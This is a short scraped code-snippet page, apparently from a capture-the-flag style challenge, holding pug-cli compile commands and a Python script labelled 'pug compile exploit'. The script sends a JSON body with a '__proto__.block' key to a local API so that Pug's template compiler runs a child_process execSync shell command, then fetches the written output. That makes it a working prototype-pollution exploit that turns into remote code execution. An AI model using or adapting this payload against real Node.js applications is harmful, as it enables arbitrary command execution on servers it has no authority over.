pug compile
npm i -g pug-cli
pug compile
npm i -g pug-cli
pug compile
pug -w . -o ./html -P
pug compile exploit
import requests
ENDPOINT = 'http://127.0.0.1:1337/api/submit'
OUTPUT = 'http://127.0.0.1:1337/static/out'
request = requests.post(ENDPOINT, json = {
"artist.name":"Gingell",
"__proto__.block": {
"type":"Text",
"line":"process.mainModule.require('child_process').execSync('ls > /app/static/out')"
}
})
print (request.text)
print (requests.get(OUTPUT).text)
Copyright © 2021 Codeinu
Forgot your account's password or having trouble logging into your Account? Don't worry, we'll help you to get back your account. Enter your email address and we'll send you a recovery link to reset your password. If you are experiencing problems resetting your password contact us